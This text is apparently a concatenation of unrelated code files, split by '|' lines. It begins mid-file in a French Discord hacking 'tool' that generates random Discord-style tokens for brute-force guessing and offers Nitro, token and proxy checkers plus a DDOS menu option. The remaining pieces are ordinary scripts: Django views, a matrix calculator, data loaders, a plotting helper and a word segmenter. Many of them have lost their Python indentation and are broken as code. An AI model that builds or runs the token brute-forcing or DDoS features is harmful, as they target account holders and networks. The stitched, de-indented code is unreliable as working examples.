██╔══██╗██╔══██╗██╔══██╗╚██╗██╔╝╚██╗░██╔╝ ██╔══██╗██║░░██║██╔════╝██╔══██╗██║░██╔╝██╔════╝██╔══██╗
██████╔╝██████╔╝██║░░██║░╚███╔╝░░╚████╔╝░ ██║░░╚═╝███████║█████╗░░██║░░╚═╝█████═╝░█████╗░░██████╔╝
██╔═══╝░██╔══██╗██║░░██║░██╔██╗░░░╚██╔╝░░ ██║░░██╗██╔══██║██╔══╝░░██║░░██╗██╔═██╗░██╔══╝░░██╔══██╗
██║░░░░░██║░░██║╚█████╔╝██╔╝╚██╗░░░██║░░░ ╚█████╔╝██║░░██║███████╗╚█████╔╝██║░╚██╗███████╗██║░░██║
╚═╝░░░░░╚═╝░░╚═╝░╚════╝░╚═╝░░╚═╝░░░╚═╝░░░ ░╚════╝░╚═╝░░╚═╝╚══════╝░╚════╝░╚═╝░░╚═╝╚══════╝╚═╝░░╚═╝
""")
print("soon soon soon soon soon soon soon soon soon soon soon soon soon soon soonsoon ")
time.sleep(3)
def TOKEN_GEN():
clear()
print(Fore.MAGENTA+'''
████████╗░█████╗░██╗░░██╗███████╗███╗░░██╗ ░██████╗░███████╗███╗░░██╗
╚══██╔══╝██╔══██╗██║░██╔╝██╔════╝████╗░██║ ██╔════╝░██╔════╝████╗░██║
░░░██║░░░██║░░██║█████═╝░█████╗░░██╔██╗██║ ██║░░██╗░█████╗░░██╔██╗██║
░░░██║░░░██║░░██║██╔═██╗░██╔══╝░░██║╚████║ ██║░░╚██╗██╔══╝░░██║╚████║
░░░██║░░░╚█████╔╝██║░╚██╗███████╗██║░╚███║ ╚██████╔╝███████╗██║░╚███║
░░░╚═╝░░░░╚════╝░╚═╝░░╚═╝╚══════╝╚═╝░░╚══╝ ░╚═════╝░╚══════╝╚═╝░░╚══╝
'''+Fore.RESET)
chars = ('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnop')
number = int(input('[+] Nombre de token >>'))
for i in range(100):
prems = ''.join((random.choice(chars) for i in range(24)))
deux = ''.join((random.choice(chars) for i in range(6)))
trois = ''.join((random.choice(chars) for i in range(27)))
result = prems + '.'+ deux + '.' + trois
l = open('gen/token_gen.txt', 'a')
l.write(result + '\n')
print("vérif ton fichier gen ;)")
time.sleep(3)
def CHECKER():
clear()
print(Fore.BLUE+"""
░█████╗░██╗░░██╗███████╗░█████╗░██╗░░██╗███████╗██████╗░ ████████╗░█████╗░░█████╗░██╗░░░░░░██████╗
██╔══██╗██║░░██║██╔════╝██╔══██╗██║░██╔╝██╔════╝██╔══██╗ ╚══██╔══╝██╔══██╗██╔══██╗██║░░░░░██╔════╝
██║░░╚═╝███████║█████╗░░██║░░╚═╝█████═╝░█████╗░░██████╔╝ ░░░██║░░░██║░░██║██║░░██║██║░░░░░╚█████╗░
██║░░██╗██╔══██║██╔══╝░░██║░░██╗██╔═██╗░██╔══╝░░██╔══██╗ ░░░██║░░░██║░░██║██║░░██║██║░░░░░░╚═══██╗
╚█████╔╝██║░░██║███████╗╚█████╔╝██║░╚██╗███████╗██║░░██║ ░░░██║░░░╚█████╔╝╚█████╔╝███████╗██████╔╝
░╚════╝░╚═╝░░╚═╝╚══════╝░╚════╝░╚═╝░░╚═╝╚══════╝╚═╝░░╚═╝ ░░░╚═╝░░░░╚════╝░░╚════╝░╚══════╝╚═════╝░
""")
print("")
print("")
print(Fore.MAGENTA+" [1] Nitro")
print(Fore.MAGENTA+" [2] Token")
print(Fore.MAGENTA+" [3]proxy"+Fore.RESET)
print("")
CHECKER_choice = input(" [+] Choice >>")
if CHECKER_choice == '1':
NITRO_CHECKER()
if CHECKER_choice == '2':
TOKEN_CHECKER()
if CHECKER_choice == '3':
PROXY_CHECKER()
elif CHECKER_choice == 'l' or 'L':
return
def IP_TOOLS():
clear()
print(Fore.BLUE+"""
██╗██████╗ ████████╗ ██████╗ ██████╗ ██╗ ███████╗
██║██╔══██╗ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██╔════╝
██║██████╔╝ ██║ ██║ ██║██║ ██║██║ ███████╗
██║██╔═══╝ ██║ ██║ ██║██║ ██║██║ ╚════██║
██║██║ ██║ ╚██████╔╝╚██████╔╝███████╗███████║
╚═╝╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝╚══════╝
"""+Fore.RESET)
print("")
print(Fore.MAGENTA+" [1] = GEOIP")
print(Fore.MAGENTA+" [2] = PINGER")
print(Fore.MAGENTA+" [3] = DDOS"+Fore.RESET)
print("")
print(Fore.BLUE+" L pour retourner en arrière"+Fore.RESET)
print("")
IP_choice = input(Fore.MAGENTA+" [>] Choix >>"+Fore.RESET)
if IP_choice == '1':
GEOIP()
if IP_choice == '2':
PINGER()
if IP_choice == '3':
DDOS()
elif IP_choice == 'l' or 'L':
return
def main():
clear()
print(Fore.RED +"""
██████ ▄▄▄█████▓ ██▀███ ▄▄▄ ███▄ █ ▄████ ▓█████ ██▀███ By Azulax
▒██ ▒ ▓ ██▒ ▓▒▓██ ▒ ██▒▒████▄ ██ ▀█ █ ██▒ ▀█▒▓█ ▀ ▓██ ▒ ██▒ By Azulax
░ ▓██▄ ▒ ▓██░ ▒░▓██ ░▄█ ▒▒██ ▀█▄ ▓██ ▀█ ██▒▒██░▄▄▄░▒███ ▓██ ░▄█ ▒ By Azulax
▒ ██▒░ ▓██▓ ░ ▒██▀▀█▄ ░██▄▄▄▄██ ▓██▒ ▐▌██▒░▓█ ██▓▒▓█ ▄ ▒██▀▀█▄ By Azulax
▒██████▒▒ ▒██▒ ░ ░██▓ ▒██▒ ▓█ ▓██▒▒██░ ▓██░░▒▓███▀▒░▒████▒░██▓ ▒██▒ By Azulax
▒ ▒▓▒ ▒ ░ ▒ ░░ ░ ▒▓ ░▒▓░ ▒▒ ▓▒█░░ ▒░ ▒ ▒ ░▒ ▒ ░░ ▒░ ░░ ▒▓ ░▒▓░ By Azulax
░ ░▒ ░ ░ ░ ░▒ ░ ▒░ ▒ ▒▒ ░░ ░░ ░ ▒░ ░ ░ ░ ░ ░ ░▒ ░ ▒░ By Azulax
░ ░ ░ ░ ░░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░░ ░ By Azulax
░ ░ ░ ░ ░ ░ ░ ░ ░ By Azulax
"""+ Fore.RESET)
print(Fore.MAGENTA+"""
╔════════════════════════════════════════════════╗
║[1]TOKEN_TOOLS [2]GENERATEUR_TOOLS ║
║[3]IP_TOOLS [4]CHECKER_TOOLS ║
╚════════════════════════════════════════════════╝
"""+Fore.MAGENTA)
print("")
choice = input(Fore.GREEN +"[+] Choix >>"+Fore.RESET)
if choice == '1':
TOKEN_TOOLS()
if choice == '2':
GENERATEUR_TOOLS()
if choice == '3':
IP_TOOLS()
if choice == '4':
CHECKER()
while True:
clear()
main()
|
from django.shortcuts import render,redirect
from .forms import ProfileForm,BusinessForm,PostForm,UpdateForm,ChangeHood
from .models import Profile,Businesses,Neighbour,Feeds
from django.http import HttpResponse,Http404
from django.contrib.auth.decorators import login_required
# Create your views here.
def index(request):
profile=Profile.objects.filter(user_id=request.user.id)
title='Home'
return render(request,'index.html',{'profile':profile,'title':title})
@login_required(login_url='/accounts/login/')
def profile(request):
profile=Profile.objects.filter(user=request.user)
busi=Businesses.objects.filter(user=request.user)
post=Feeds.objects.filter(user=request.user)
if request.method=='POST':
instance=Profile.objects.get(user=request.user)
form=UpdateForm(request.POST or None,request.FILES,instance=instance)
if form.is_valid():
upda=form.save(commit=False)
upda.save()
return redirect('profile')
else:
form=UpdateForm()
if request.method=="POST":
instance=Profile.objects.get(user=request.user)
change=ChangeHood(request.POST or None,request.FILES,instance=instance)
if change.is_valid():
chan=change.save(commit=False)
chan.save()
return redirect('profile')
else:
change=ChangeHood()
title='Profile'
return render(request,'profile.html',{'profile':profile,"busi":busi,'post':post,"form":form,'title':title,'change':change})
@login_required(login_url='/accounts/login/')
def edit(request):
if request.method=='POST':
form=ProfileForm(request.POST,request.FILES)
if form.is_valid():
profile=form.save(commit=False)
profile.user=request.user
profile.save()
return redirect("profile")
else:
form=ProfileForm()
title="Edit"
return render(request,'edit.html',{'form':form,'title':title})
@login_required(login_url='/accounts/login/')
def business(request):
if request.method=='POST':
form=BusinessForm(request.POST)
if form.is_valid():
busi=form.save(commit=False)
busi.user=request.user
            busi.save()
return redirect('profile')
else:
form=BusinessForm()
return render(request,'business.html',{'form':form})
@login_required(login_url='/accounts/login/')
def feeds(request):
try:
profile=Profile.objects.filter(user=request.user)
arr=[]
for i in profile:
arr.append(i.neigbor.id)
id=arr[0]
business=Businesses.objects.filter(neigbor=id)
feed=Feeds.objects.filter(neigbor=id)
pop_count=Profile.objects.filter(neigbor=id)
all_hoods=Neighbour.objects.filter(id=id)
except Exception as e:
raise Http404()
if request.method=='POST':
form=PostForm(request.POST,request.FILES)
if form.is_valid():
post=form.save(commit=False)
post.user=request.user
post.neigbor=Neighbour(id)
post.save()
return redirect('feeds')
else:
form=PostForm()
title='Feeds'
return render(request,"feeds.html",{"business":business,'form':form,'feed':feed,'hoods':all_hoods,'title':title,'pop':pop_count ,'profile':profile})
@login_required(login_url='/accounts/login/')
def search(request):
    if 'businessesName' in request.GET and request.GET['businessesName']:
        name=request.GET.get('businessesName')
        results=Businesses.search_business(name)
        return render(request,'search.html',{'business':results,'name':name})
    else:
        # no search term given; render the page without results instead of returning None
        return render(request,'search.html',{})
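# A matching urls.py sketch (route names inferred from the redirects above; URL paths are assumptions):
# from django.urls import path
# from . import views
# urlpatterns = [
#     path('', views.index, name='index'),
#     path('profile/', views.profile, name='profile'),
#     path('edit/', views.edit, name='edit'),
#     path('business/', views.business, name='business'),
#     path('feeds/', views.feeds, name='feeds'),
#     path('search/', views.search, name='search'),
# ]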
|
#!/usr/bin/env python3
import os
import subprocess
import tempfile
from pathlib import Path
import pandas as pd
path_to_file = os.path.realpath(__file__)
repo_root = Path(path_to_file).parent.parent
INPUT_ZIP = repo_root / "downloaded-data" / "fine-grained-refactorings.zip"
SAVE_TO = repo_root / "data" / "fine-grained-refactorings.csv"
with tempfile.TemporaryDirectory() as tmpdir:
    subprocess.run(["unzip", INPUT_ZIP, "-d", tmpdir])
    dfs = [
        pd.read_csv(file)
        for file in (Path(tmpdir) / "manualy_labeled_commits (goldset)").iterdir()
    ]
concat_dfs = pd.concat(dfs, axis=0, ignore_index=True)
concat_dfs["owner"] = ""
concat_dfs["repository"] = ""
new_columns = concat_dfs.columns.values.tolist()
new_columns[0] = "sha"
concat_dfs.columns = new_columns
concat_dfs.to_csv(SAVE_TO, index_label="commit_id")
# echo "sha,commit_date,message,refactoring_class,refactoring_type,owner,repository" >> "$OUTPUT_CSV"
|
height = int(input())
num = 1
for i in range(1, height + 1):
for j in range(1, height - i + 2):
if(i == 1 or j == 1 or j == height - i + 1):
print(height-i+1,end=" ")
else:
print(end=" ")
print()
# Sample Input :- 5
# Output :-
# 5 5 5 5 5
# 4   4
# 3  3
# 2 2
# 1
|
print("
___ ___ ___ ________ _________ ________ ___ __
|\ \|\ \|\ \|\ ____\|\___ ___\\ ____\|\ \|\ \
\ \ \ \ \\\ \ \ \___|\|___ \ \_\ \ \___|\ \ \/ /|_
__ \ \ \ \ \\\ \ \_____ \ \ \ \ \ \ \ __\ \ ___ \
|\ \\_\ \ \ \\\ \|____|\ \ \ \ \ \ \ \|\ \ \ \\ \ \
\ \________\ \_______\____\_\ \ \ \__\ \ \_______\ \__\\ \__\
\|________|\|_______|\_________\ \|__| \|_______|\|__| \|__|
\|_________|
")
mat1=[]
mat2=[]
mat3=[]
def creat(r,c,r1,c1):
mat=[]
global mat2,mat1
print("enter elements of 1st matrix:",end=" ")
for i in range(3):#creation of mat1
b=[]
for j in range(3):
insert=0
b.append(insert)
mat1.append(b)
print()
for i in range(r):#creation of mat2
b=[]
for j in range(c):
insert=0
b.append(insert)
mat2.append(b)
for i in range(r):#inserting elements in mat1
b=[]
for j in range(c):
insert=int(input(f"enter {i}{j} elment of mat1 "))
b.append(insert)
mat.append(b)
mat1=mat
print("matrix 1 = ",end=" ")
print()
for i in range(r):#displaying mat1
print("| ",end="")
for j in range(c):
print(mat1[i][j], end=" ")
print("|",end="")
print()
print(end=" ")
print()
mat=[]
print("enter elements of 2st matrix:", end=" ")
print()
for i in range(r1):#inserting elements in mat2
b=[]
for j in range(c1):
insert=int(input(f"enter {i}{j} elment of mat2 "))
b.append(insert)
mat.append(b)
mat2=mat
print("matrix2 = ",end="")
print()
for i in range(r1):#displaying mat2
print("| ",end="")
for j in range(c1):
print(mat2[i][j], end=" ")
print("|",end="")
print()
print(end=" ")
# creat(r,c)
def add(mat1,mat2):#for addition
# m1=[[1,2,3],[1,2,3],[1,2,3]]
# m2=[[1,2,3],[1,2,3],[1,2,3]]
res=[]
for i in range(r):
b=[]
for j in range(c):
insert=0
b.append(insert)
res.append(b)
for i in range(r):
for j in range(c):
res[i][j]=(mat1[i][j]+mat2[i][j])
print("matrix 1 = ")
print()
for i in range(r):#displaying mat1
print("| ",end="")
for j in range(c):
print(mat1[i][j], end=" ")
print("|",end="")
print()
print()
print("matrix2 = ", end="")
print()
for i in range(r1): # displaying mat2
print("| ", end="")
for j in range(c1):
print(mat2[i][j], end=" ")
print("|", end="")
print()
print(end=" ")
print("addition of matrices is =",end=" ")
print()
for i in range(r):
print("| ",end="")
for j in range(c):
print(res[i][j], end=" ")
print("|",end="")
print()
print(end=" ")
def sub(mat1,mat2):#for subtraction
res=[]
print("matrix 1 = ")
print()
for i in range(r): # displaying mat1
print("| ", end="")
for j in range(c):
print(mat1[i][j], end=" ")
print("|", end="")
print()
print()
print("matrix2 = ", end="")
print()
for i in range(r1): # displaying mat2
print("| ", end="")
for j in range(c1):
print(mat2[i][j], end=" ")
print("|", end="")
print()
print()
print("subtraction of matrices is =")
for i in range(r):
b=[]
for j in range(c):
insert=0
b.append(insert)
res.append(b)
for i in range(r):
for j in range(c):
res[i][j]=(mat1[i][j]-mat2[i][j])
for i in range(r):
print("| ",end="")
for j in range(c):
print(res[i][j], end=" ")
print("|",end="")
print()
print(end=" ")
print()
print()
def multi(mat1,mat2):#for multiplication
res = []
for i in range(r):
b = []
for j in range(c1):
insert = 0
b.append(insert)
res.append(b)
for i in range(r):
for j in range(c1):
for k in range(r1):
res[i][j]=res[i][j]+(mat1[i][k]*mat2[k][j])#i for row of mat 1
# k for coloumn of mat1 and row of mat2
# j for column of mat 2
for i in range(r):
print("| ",end="")
for j in range(c1):
print(res[i][j], end=" ")
print("|",end="")
print()
print(end=" ")
def transpose(r2,c2):
global mat3
mat=[]
print("enter elements of 1st matrix:", end=" ")
print()
    for i in range(3): # creation of mat3
b = []
for j in range(3):
insert = 0
b.append(insert)
mat3.append(b)
for i in range(r2):#inserting elements in mat
b=[]
for j in range(c2):
insert=int(input(f"enter {i}{j} elment of mat "))
b.append(insert)
mat.append(b)
mat3=mat
res=[]
for i in range(c2):
l=[]
for j in range(r2):
insert=0
l.append(insert)
res.append(l)
print("original matrix:")
for i in range(r2):#displaying mat
print("| ",end="")
for j in range(c2):
print(mat3[i][j], end=" ")
print("|",end="")
print()
for i in range(len(mat3)):
for j in range(len(mat3[0])):
res[j][i]=mat3[i][j]
print()
print("transpose of matrix :")
for i in range(c2):#displaying mat
print("| ",end="")
for j in range(r2):
print(res[i][j], end=" ")
print("|",end="")
print()
r=c=r1=c1=0 # default sizes so choosing an operation before option 0 does not crash
run=1
while run:
print("for creating matrices:0")
print("for addition of matrices type 1:")
print("for subtraction of matrices type 2:")
print("for multiplication of matrices type 3:")
print("for transpose of matrix type 4:")
choice=int(input("Enter your choice:"))
if choice==1:
if r==r1 and c==c1:
add(mat1,mat2)
else:
print("number of rows and columns of both matrices are not same")
elif choice==0:
r=int(input("enter number of rows of mat1 : "))
c=int(input("enter number of columns of mat1 : "))
r1=int(input("enter number of rows of mat2: "))
c1=int(input("enter number of columns of mat2: "))
creat(r,c,r1,c1)
elif choice==2:
if r==r1 and c==c1:
sub(mat1,mat2)
else:
print("number of rows and columns of both matrices are not same")
elif choice==3:
if c==r1:
multi(mat1,mat2)
else:
print("number of cols of mat1 is not eqaul to number of rows in mat2")
elif choice==4:
r2 = int(input("enter number of rows of mat : "))
c2 = int(input("enter number of columns of mat : "))
transpose(r2,c2)
else:
break
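# Example session: enter 0 first to create the matrices (e.g. 2x2 and 2x2),
# then 1/2/3 to add/subtract/multiply them, 4 for a transpose; any other choice exits.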
|
from pathlib import Path
import pandas as pd
import numpy as np
import torch
from decimal import Decimal, ROUND_HALF_UP
import sys
def length_regulator(negos: list, ratio: float):
filtered_dataset = []
# calc # of turns & format the dataset
for nego in negos:
comments = []
raw_comments = []
comment = ""
raw_comment = ""
prev_mover_tag = None
for token in nego[0].split(' '):
if token == "YOU:" or token == "THEM:":
if prev_mover_tag != token and prev_mover_tag is not None:
comments.append(comment)
raw_comments.append(raw_comment)
comment = '<sep>'
raw_comment = token
prev_mover_tag = token
else:
comment = '<sep>'
raw_comment = token
prev_mover_tag = token
else:
if comment == "":
comment = token
raw_comment = token
else:
comment = comment + ' ' + token
raw_comment = raw_comment + ' ' + token
        # flush the last accumulated turn, then add an end tag
        comments.append(comment)
        raw_comments.append(raw_comment)
        raw_comments.append('<end>')
# for early detection
turn_count = 0
num_turns = len(comments) * ratio
num_turns = int(Decimal(str(num_turns)).quantize(Decimal('0.1'), rounding=ROUND_HALF_UP))
if num_turns < 1:
num_turns = 1
dialogue = ""
raw_dialogue = ""
for raw_comment, comment in zip(raw_comments, comments):
# for early detection
if turn_count == num_turns:
break
turn_count += 1
if dialogue != "":
dialogue = dialogue + ' ' + comment
if raw_comment != '<end>':
raw_dialogue = raw_dialogue + ' ' + raw_comment
else:
dialogue = comment
if raw_comment != '<end>':
raw_dialogue = raw_comment
dialogue += ' ' + '<end>'
filtered_dataset.append([raw_dialogue, dialogue, nego[1]])
return filtered_dataset
def load_negotiation(path: Path, is_like_dn: bool, ratio: float):
"""Load dataset and make csv files."""
def get_tag(tokens, tag):
return tokens[tokens.index('<'+ tag + '>') + 1: tokens.index('</' + tag + '>')]
def remove_duplication(dataset: list):
"""Remove duplicated logs."""
duplicate_flag = False
nego_b = []
filtered_dataset = []
for index, nego in enumerate(dataset):
if index >= 1:
# check duplicate? index, breakdown flag, duplicate flag
if (nego[0] == nego_b[0] + 1) and nego[2] == nego_b[2] and duplicate_flag is False:
nego_b = nego
duplicate_flag = True
continue
filtered_dataset.append([nego[1], nego[2], nego[3], nego[4], nego[5], nego[-1]])
nego_b = nego
duplicate_flag = False
return filtered_dataset
def preprocessing_dataset(index: int, scenario, is_like_dn: bool):
dialogue = ' '.join([token for token in scenario[3] if token != '<eos>'])
value = [int(val) for val in scenario[0][1::2]]
counter_value = [int(val) for val in scenario[1][1::2]]
normed_value = np.array(value) / np.sum(value)
normed_counter_value = np.array(counter_value) / np.sum(counter_value)
values = np.concatenate((normed_value, normed_counter_value)).tolist()
flag = 0
if ('<disagree>' in scenario[2]) or ('<no_agreement>' in scenario[2]):
flag = 1
score_you, score_them = 0., 0.
if is_like_dn is False:
return [index, dialogue, flag, score_you, score_them, score_them + score_you, values]
else:
return [dialogue, flag, score_you, score_them, score_them + score_you, values]
item_count = [(int(num_item.split('=')[1])) for num_item in scenario[2]]
score_you = np.dot(value, item_count[:3])
score_them = np.dot(counter_value, item_count[3:])
# debug:
# print(f'{score_you} : {score_them}')
if is_like_dn is False:
return [index, dialogue, flag, score_you, score_them, score_them + score_you, values]
else:
return [dialogue, flag, score_you, score_them, score_them + score_you, values]
dataset = []
text = path.read_text('utf-8').split('\n')
for index, line in enumerate(text):
tokens = line.strip().split() # split into elements
scenario = []
# for empty list
if tokens == []:
continue
for tag in ['input', 'partner_input', 'output', 'dialogue']:
scenario.append(get_tag(tokens, tag))
# discard unreached an agreement dialogue
if '<disconnect>' in scenario[2]:
continue
scenario = preprocessing_dataset(index, scenario, is_like_dn)
dataset.append(scenario)
if is_like_dn is False:
dataset = remove_duplication(dataset)
dataset = length_regulator(dataset, ratio=ratio)
print(f'{path.name}: {len(dataset)} scenarios.')
df = pd.DataFrame(dataset, columns=['raw_text', 'text', 'flag'])
df.to_csv(sys.argv[2], index=False)
if __name__ == '__main__':
if len(sys.argv) <= 2:
raise Exception("Please give a valid dataset path!")
path = sys.argv[1]
r_path = Path(path)
load_negotiation(r_path, is_like_dn=False, ratio=1.0)
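# Usage sketch (script and file names are placeholders):
#   python3 this_script.py data/train.txt data/train.csv
# sys.argv[1] is the raw negotiation log, sys.argv[2] the csv written by load_negotiation.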
|
#!/usr/bin/env python3
#-*- coding: utf-8 -*-
"""
This module provides class and methods for plotting curves.
"""
from typing import Union, Optional
import matplotlib.pyplot as plt
import numpy as np
def plot_curve(y: Union[list,tuple,'np.array'],
x: Optional[Union[list,tuple,'np.array']] = None,
periodic_x: Optional[Union[float,tuple,list]] = None,
relative_x: Optional[Union[int, str]] = None,
xlabel: str = '',
relative_y: Optional[Union[int, str]] = None,
ylabel: str = '',
highlight_index: Optional[int] = None,
ax: 'matplotlib.pyplot.axes' = None,
):
"""
    A universal function to plot an energy curve.
    Args:
        y (list-like): A list-like object to be plotted as the y variable.
        x (list-like): A list-like object to be plotted as the x variable.
"""
# Modify x variables
if relative_x != None:
if isinstance(relative_x, int):
# Reference based on the index
try:
x_ref = x[relative_x]
            except IndexError:
                raise ValueError('Invalid relative_x. If an int is given, it should be within '
                                 'the range of indices.')
elif isinstance(relative_x, str):
if relative_x == 'min':
x_ref = np.min(x)
elif relative_x == 'max':
x_ref = np.max(x)
else:
raise NotImplementedError('The relative_x method is not supported.')
x = np.array(x) - x_ref
if periodic_x:
if isinstance(periodic_x, (int, float)):
# the periodic range is 0 to the value
periodic_x = [0, periodic_x]
try:
periodicity = periodic_x[1] - periodic_x[0]
except:
raise ValueError(f'Invalid periodic_x value {periodic_x}')
too_small = x < periodic_x[0]
too_large = x > periodic_x[1]
while any(too_small) or any(too_large):
x[too_small] += periodicity
x[too_large] -= periodicity
too_small = x < periodic_x[0]
too_large = x > periodic_x[1]
# Modify y variables
if relative_y != None:
if isinstance(relative_y, int):
# Reference based on the index
try:
y_ref = y[relative_y]
            except IndexError:
                raise ValueError('Invalid relative_y. If an int is given, it should be within '
                                 'the range of indices.')
elif isinstance(relative_y, str):
if relative_y == 'min':
y_ref = np.min(y)
elif relative_y == 'max':
y_ref = np.max(y)
else:
                raise NotImplementedError('The relative_y method is not supported.')
y = np.array(y) - y_ref
ax = ax or plt.axes()
if x is None:
        x = np.arange(len(y))
ax.plot(x, y, '.-')
ax.set(xlabel=xlabel, ylabel=ylabel)
    if highlight_index is not None and highlight_index < len(x):
ax.plot(x[highlight_index], y[highlight_index], 'ro')
return ax
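if __name__ == '__main__':
    # Minimal usage sketch with made-up data (not part of the original module):
    # a periodic, torsion-scan-like curve plotted relative to its minimum.
    angles = np.arange(0., 360., 10.)
    energies = np.cos(np.radians(angles)) + 1.0
    ax = plot_curve(energies, x=angles, periodic_x=(0., 360.), relative_y='min',
                    xlabel='angle (degree)', ylabel='relative energy')
    plt.show()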
|
#!/bin/python3
import sys
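# Simulates a circular cloud walk: start with 100 energy; each iteration charges 2
# units if the current cloud is a thundercloud (c[i] == 1), then jumps k clouds
# around the ring of n clouds at a cost of 1, stopping once the walk returns to cloud 0.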
PENALTY_THUNDERBOLT = 2
PENALTY_JUMP = 1
e = 100
n, k = map(int, input().split())
c = tuple(map(int, input().split()))
i = 0
while True:
if c[i]:
e -= PENALTY_THUNDERBOLT
i = (i + k) % n
e -= PENALTY_JUMP
if i == 0:
break
print(e)
|
# -*- coding: utf-8 -*-
"""Module for constructing <b> tag."""
from __future__ import absolute_import
from ...templates.html.tags import bold
class B(object):
"""Class for constructing bold tag.
Args:
text (str): Bold tag text. (Ex. <b>text</b>)
.. versionadded:: 0.1.0
.. versionchanged:: 0.2.0
Renamed the method construct_tag to construct.
"""
def __init__(self, text=None):
self.tag = 'b'
self.values = {'text': text}
def construct(self):
"""Returns the constructed bold tag <b></b>."""
return bold.render(self.values)
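# Usage sketch (assumes the bold template renders {'text': ...} into the tag):
#   B(text='hello').construct()  ->  '<b>hello</b>'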
|
#coding=utf-8
"""
Chinese word segmentation algorithm without corpus
Author: 段凯强
Reference: http://www.matrix67.com/blog/archives/5044
"""
from __future__ import division, print_function
import re
import time
from .probability import entropyOfList
from .sequence import genSubparts, genSubstr
def indexOfSortedSuffix(m_data, max_word_len):
"""
Treat a suffix as an index where the suffix begins.
Then sort these indexes by the suffixes.
"""
indexs = {}
for i in range(len(m_data)):
sl = len(m_data[i]) + 1
indexs[i] = []
for j in range(sl):
            indexs[i].append((j, min(sl, max_word_len+j+1)))
# for k in range(j+1, min(sl,max_word_len+j+1)):
# indexs[i].append((j,k))
return indexs
class WordInfo(object):
"""
    Store information of each word, including its frequency, left neighbors and right neighbors
"""
def __init__(self, text):
super(WordInfo, self).__init__()
self.text = text
self.freq = 0.0
self.left = []
self.right = []
self.aggregation = 0
self.entropy = 0
def update(self, left, right):
"""
Increase frequency of this word, then append left/right neighbors
@param left a single character on the left side of this word
@param right as left is, but on the right side
"""
self.freq += 1
if left: self.left.append(left)
if right: self.right.append(right)
def compute(self, length):
"""
Compute frequency and entropy of this word
@param length length of the document for training to get words
"""
self.freq /= length
# self.left = entropyOfList(self.left)
# self.right = entropyOfList(self.right)
self.entropy = min(entropyOfList(self.left), entropyOfList(self.right))
def computeAggregation(self, words_dict):
"""
Compute aggregation of this word
@param words_dict frequency dict of all candidate words
"""
parts = genSubparts(self.text)
if len(parts) > 0:
self.aggregation = min(map(
lambda p: self.freq/words_dict[p[0]].freq/words_dict[p[1]].freq,
parts
))
class WordSegment(object):
"""
Main class for Chinese word segmentation
1. Generate words from a long enough document
2. Do the segmentation work with the document
"""
# if a word is combination of other shorter words, then treat it as a long word
L = 0
# if a word is combination of other shorter words, then treat it as the set of shortest words
S = 1
# if a word contains other shorter words, then return all possible results
ALL = 2
def __init__(self, doc, max_word_len=5, min_freq=0.00005, min_entropy=2.0, min_aggregation=50):
super(WordSegment, self).__init__()
t = time.time()
self.max_word_len = max_word_len
self.min_freq = min_freq
self.min_entropy = min_entropy
self.min_aggregation = min_aggregation
self.word_infos = self.genWords(doc)
        # Result information, i.e., averages over all words
word_count = len(self.word_infos)
self.avg_len = sum(map(lambda w: len(w.text), self.word_infos))/word_count
self.avg_freq = sum(map(lambda w: w.freq, self.word_infos))/word_count
# self.avg_left_entropy = sum(map(lambda w: w.left, self.word_infos))/word_count
# self.avg_right_entropy = sum(map(lambda w: w.right, self.word_infos))/word_count
self.avg_aggregation = sum(map(lambda w: w.aggregation, self.word_infos))/word_count
# Filter out the results satisfy all the requirements
filter_func = lambda v: len(v.text) > 1 and v.aggregation > self.min_aggregation and\
v.freq > self.min_freq and v.entropy > self.min_entropy
        # materialize to a list: a bare map iterator would be exhausted after its first use
        self.word_with_freq = list(map(lambda w: (w.text, w.freq), filter(filter_func, self.word_infos)))
        self.words = list(map(lambda w: w[0], self.word_with_freq))
print('total_time:%s seconds'%round(time.time() - t, 3))
def wash_data(self, raw_data):
pattern = re.compile(u'[\\s\\d,.<>/?:;\'\"[\\]{}()\\|~!@#$%^&*\\-_=+a-zA-Z,。《》、?:;“”‘’{}【】()…¥!—┄-]+')
doc = re.sub(pattern, ' ', raw_data).split()
return doc
def genWords(self, doc):
"""
Generate all candidate words with their frequency/entropy/aggregation informations
@param doc the document used for words generation
"""
doc = self.wash_data(doc)
# suffix_indexes = indexOfSortedSuffix(doc, self.max_word_len)
word_cands = {}
for line in doc:
sl = len(line)+1
for j in range(sl):
left = line[j-1]
maxLen = self.max_word_len+j+1
for k in range(j+1, min(maxLen, sl)):
word = line[j:k]
right = line[k:k+1]
if word not in word_cands:
word_cands[word] = WordInfo(word)
word_cands[word].update(left, right)
# compute frequency and neighbors
# for i, indexes in suffix_indexes.items():
# for index in indexes:
# word = doc[i][index[0]:index[1]]
# if word not in word_cands:
# word_cands[word] = WordInfo(word)
# word_cands[word].update(doc[i][index[0] - 1:index[0]], doc[i][index[1]:index[1] + 1])
# compute probability and entropy
length = len(''.join(doc))
for k in word_cands:
word_cands[k].compute(length)
# compute aggregation of words whose length > 1
values = sorted(word_cands.values(), key=lambda x: len(x.text))
for v in values:
if len(v.text) == 1: continue
v.computeAggregation(word_cands)
return sorted(values, key=lambda v: v.freq, reverse=True)
def segSentence(self, sentence, method=ALL):
"""
Segment a sentence with the words generated from a document
@param sentence the sentence to be handled
@param method segmentation method
"""
i = 0
res = []
while i < len(sentence):
if method == self.L or method == self.S:
j_range = range(self.max_word_len, 0, -1) if method == self.L else list(range(2, self.max_word_len + 1)) + [1]
for j in j_range:
if j == 1 or sentence[i:i + j] in self.words:
res.append(sentence[i:i + j])
i += j
break
else:
to_inc = 1
for j in range(2, self.max_word_len + 1):
if i + j <= len(sentence) and sentence[i:i + j] in self.words:
res.append(sentence[i:i + j])
if to_inc == 1: to_inc = j
if to_inc == 1: res.append(sentence[i])
i += to_inc
return res
if __name__ == '__main__':
doc = u'十四是十四四十是四十,,十四不是四十,,,,四十不是十四'
ws = WordSegment(doc, max_word_len=2, min_aggregation=1.2, min_entropy=0.4)
print( ' '.join(map(lambda w: '%s:%f'%w, ws.word_with_freq)))
print(' '.join(ws.words))
print(' '.join(ws.segSentence(doc)))
print('average len: ', ws.avg_len)
print('average frequency: ', ws.avg_freq)
    # avg_left_entropy / avg_right_entropy are commented out in __init__, so only the metrics above are printed
print('average aggregation: ', ws.avg_aggregation)
|
from GA import GARuck
import argparse
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parse_args = "pop_size,n_generations,n_agents,n_timesteps,mut_tile_size,mut_tile_no," \
